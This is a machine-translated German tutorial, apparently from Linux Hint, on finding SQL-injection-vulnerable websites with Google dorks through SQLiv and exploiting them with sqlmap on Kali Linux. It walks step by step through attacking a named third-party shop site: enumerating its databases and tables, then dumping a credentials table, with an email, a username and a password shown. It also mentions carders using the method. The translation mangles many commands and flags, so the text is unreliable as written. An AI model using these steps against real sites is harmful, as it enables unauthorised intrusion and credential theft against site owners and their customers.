Aber neben der Leichtigkeit und den Funktionen, die die Datenbank anbietet, sowie die vielen Verwendungen von Datenbanken in der Welt der Information und Technologie, insbesondere bei der Entwicklung einer Website. Unaufhörend Pentesters und Hacker versuchen, eine Lücke in der Sicherheit der Datenbank zu finden. Dies wird durch den Bericht von positiven Technologienforschern, Forschungszentren für Informationssicherheit in Europa, im zweiten Quartal 2017 bestätigt, die Top-10-Angriffe auf Webanwendungen wurden von Cross-Site-SCIPTING von 39 dominiert.1% und SQL -Injektion von 24.9%. Positive Technologien sagten, der Bericht im zweiten Quartal unterscheidet sich nicht wesentlich vom ersten Quartal.
Abbildung 1. Top 10 Webanwendungsangriffe (Quelle PTSecurity.com)
Dies ist sowohl interessant als auch besorgniserregend, da in einer Datenbank viele Informationen wie Anmeldeinformationen (Administrator und Benutzer), Finanzinformationsdetails (z. B. Kreditkarten, Bankkonten usw.) usw. Um SQL -Injektionsangriffe durchzuführen. Da es viele kostenlose Anwendungen gibt, die die SQL -Injektion automatisch durchführen können, z. B. SQLMAP. SQLMAP ist eine Open -Source -Anwendung für Penetrationstestaktivitäten, mit denen SQL -Injektionsangriffe in einem Datenbank -Sicherheitsloch automatisch durchgeführt werden sollen. Hier werde ich Ihnen zeigen, wie man SQL -Injektion mit SQLMAP in Linux Kali macht. Es sind keine besonderen Funktionen erforderlich, aber es ist mehr wert, wenn Sie eine Skriptsprache oder eine SQL -Datenbanktechnologie beherrschen.
Dieses Tutorial wird für diejenigen empfohlen, die bei der SQL -Injektion in Kali Linux neu sind, nur zum Spaß, oder die sehen möchten, wie SQL -Injektion funktioniert. Es wird nicht empfohlen, dass dies bereits hochqualifizierte Penetrationstester sind.
Hallo, ich bin Bimando, der Autor dieses Artikels. Wenn Ihnen dieser Artikel gefällt. Ich habe hart daran mit dem Linux -Hint -Team gearbeitet, um ein hochwertiges Produkt zu produzieren, von dem Sie wissen, dass Sie es lieben und viel lernen werden.
SQL -Injektion unter Verwendung von SQLMAP in Kali Linux
Bevor wir den Injektionsangriff durchführen, müssen wir natürlich sicherstellen, dass der Server oder das Ziel über ein Datenbanksicherheitsloch verfügt. Um Datenbanksicherheitslöcher zu finden, können wir verschiedene Methoden verwenden. Unter ihnen wird Google Dorking hauptsächlich von Hacker- und Penetrationstestern verwendet. Zum Glück gibt es ein Tool, das dies automatisch tun kann. Aber wir müssen zuerst sein Werkzeug installieren. Das Tool heißt SQLIV (SQL Injection Schwachbarkeits -Scanner).
Schritt 1: Installieren Sie SQLIV unter Kali Linux
Geben Sie unten Befehle in Ihr Terminal ein, um SQLIV zu installieren:
~# Git Clone https: // github.com/hadesy2k/sqliv.Git
~# CD SQLIV && sudo python2 setup.py -i
Sobald SQLIV in Ihrem Kali Linux installiert ist, wird es im Pfad gespeichert /usr/bin/sqliv. Was Sie direkt vom Terminal aus aufrufen können, indem Sie "SQLIV" eingeben. Schauen wir uns nun die SQLIV -Funktionen an.
Schritt 2: Finden von SQL Injection Schwachstellen
Wir werden Google Dorking verwenden, um das SQL -Injektionsloch in Zielen zu scannen und zu finden. Nehmen wir einen einfachen Trottel und lassen Sie SQLIV jedes einzelne Ziel durchsuchen und suchen.Php?id = '. Um andere Muster zu finden, nur Google für "Google Dork List".
~# SQLIV -D INURL: Element.Php?id = -e google -p 100
Standardmäßig kriecht SQLIV die erste Seite auf Suchmaschine, die auf Google 10 -Websites pro Seite. So definieren wir hier Argumentation -P 100 10 Seiten (100 Stellen) kriechen, um zu kriechen. Basierend auf dem oben angegebenen Trottel haben wir ein Ergebnis von gefährdeten URLs erhalten, die so aussehen:
Wir fanden acht von hundert URLs gescannt und als verletzlich gegen SQL -Injektionsangriffe. Speichern Sie die URLs für weitere Schritte in den Texteditor für weitere Schritte.
Schritt 3: SQL -Injektion mit SQLMAP
Sobald wir mindestens eine SQL -Injektion verletztes Ziel erhalten haben, führen wir den Angriff mit SQLMAP aus. Ich nehme einen von ihnen, um hier ein Beispiel zu sein. Zunächst müssen wir den Datenbanknamen in der Datenbank angeben, die Tabellen und Spalten enthält, die die Daten enthalten.
Ziel-URL : http: // www.Acfurniture.com/item.Php?id = 25
Befehlsmuster:
~# SQLMAP -U "Ziel -URL" -DBS
-u / --URL: Ziel -URL
--DBS: Aufzählung der Datenbank/s -Namen
Der kompilierte Befehl würde also so aussehen:
~# SQLMAP -U “http: // www.Acfurniture.com/item.Php?id = 25 ” - -dbs
Aus dem obigen Befehl sollte das Ergebnis so aussehen
Wir haben den Datenbanknamen "Acfurniture”.
Befehlsmuster:
~# SQLMAP -U "Ziel -URL" -D -Datenbankname -Tabellen
Der kompilierte Befehl ist also wie folgt:
~# SQLMAP -U "http: // www.Acfurniture.com/item.Php?ID = 25 "-D -ACFurniture -Tabellen
Das Ergebnis sollte so aussehen:
Bisher können wir zu dem Schluss kommen, dass die Anordnung von Daten die Website ist Acfurniture.com hat zwei Datenbanken, Acfurniture Und Information_schema. Die Datenbank benannt Acfurniture Enthält vier Tische: Kategorie, Produkt, product_hacked, Und Einstellungen. Es gibt keinen kompromittierten Tabellennamen, aber lasst uns mehr untersuchen. Lassen Sie sehen, was drinnen ist Einstellungen Tisch. In der Tabelle gibt es tatsächlich Spalten und die Daten.
Befehlsmuster:
~# SQLMAP -U "Ziel -URL" -D -Datenbankname -t -Tabellenname -Spalte
Der kompilierte Befehl ist also wie folgt:
~# SQLMAP -U "http: // www.Acfurniture.com/item.Php?ID = 25 "-D ACFurniture -t -Einstellungen -Säulen
Die Ausgabe sollte so aussehen:
Der Einstellungen Tabelle besteht aus 6 Spalten, Und dies ist eigentlich ein Anmeldeinformationskonto. Lassen Sie uns diese Daten entlassen.
Befehlsmuster:
~# SQLMAP -U "Ziel -URL" -D -Datenbankname -t -Tabellenname -c -Spalten -Dump
Der kompilierte Befehl ist also wie folgt:
~# SQLMAP -U "http: // www.Acfurniture.com/item.Php?ID = 25 "-D ACFurniture -t -Einstellungen -C -Benutzername, Passwort -Dump
Oder Sie können auch alle Daten in der Tabelle mit dem Befehl ablegen:
~# SQLMAP -U "http: // www.Acfurniture.com/item.Php?ID = 25 "-D Acfurniture -t -Einstellungen -Dump
Die Ausgabe sollte so aussehen:
Email : [email protected]
Nutzername : Gutaussehend
Passwort : 9HPKO2NKRHBGMYWZIZXUI
Okay, wir sind mit der SQL -Injektion in der Datenbank fertiggestellt. Unsere nächsten Aufgaben sind, um das zu finden Tür oder Admin -Bedienfeld, Administratoranmeldeseite auf den Zielseiten. Bevor dies dies tun, stellen Sie sicher, ob dieses Passwort (9HPKO2NKRHBGMYWZIZXUI) verschlüsselt ist oder nicht. Wenn ja, müssen wir es zuerst entschlüsseln. Das ist ein weiteres Thema, das knackt und entschlüsselt.
Sogar hier hacken wir uns nicht in die Zielseite, zumindest haben wir viel über die SQL -Injektion mit SQLMAP in Kali Linux leicht gelernt und wir ließen das Konto für Anmeldeinformationen ab. Diese Technik wird hauptsächlich von Carder (Hacker, der auf E-Commerce-Websites nach Kreditkartenkonto sucht) verwendet, die sich auf Finanz-, Bank-, Shop- oder E-Commerce-Websites abzielen, die ihre Benutzer-Kreditkarteninformationen speichern.